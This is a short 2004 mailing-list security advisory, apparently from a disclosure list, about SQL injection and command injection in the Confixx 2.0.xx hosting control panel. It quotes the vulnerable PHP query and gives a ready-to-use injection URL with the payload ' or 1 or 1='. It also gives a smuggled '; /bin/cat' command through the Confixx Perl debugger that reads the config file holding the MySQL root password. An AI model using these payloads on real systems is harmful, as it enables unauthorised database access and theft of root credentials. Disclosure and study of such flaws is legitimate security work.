[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20040309092447.2871.qmail@mail.krefeld.schulen.net>
From: checker at mail.krefeld.schulen.net (checker@...l.krefeld.schulen.net)
Subject: Confixx 2.0.xx SQL_Injections and reading MySQL Root-PW
SQL-Injections in Confixx 2.0.xx // reading MySQL Root-PW
include("auth.php");
db_connect($db_host, $db_user, $db_pass);
$id = db_query("select count(datenbank) as mysql from mysql_datenbanken
where kunde = '$PHP_AUTH_USER'");
$werte = db_fetch_array($id);
$mysql = $werte["mysql"];
$id = db_query("select dbname from mysql_datenbanken where kunde =
'$PHP_AUTH_USER' and datenbank = '$db'");
--------------------------------^^^^^^^^^
$db --> unchecked Value
____
/user/db_mysql_loeschen2.php?db=1
SELECT db FROM sqldb WHERE user='$USER' AND db='$formular_wert'
using: ' or 1 or 1='
the SQL query look like :
SELECT db FROM sqldb WHERE user='$USER' AND db='' or 1 or 1=''
/user/db_mysql_loeschen2.php?db=' or 1 or 1='
______
Confixx Perl Debugger
using:
; /bin/cat location_of_Confixx_config_file
to read the config with MySQL Root-PW
_______
wkr
Powered by blists - more mailing lists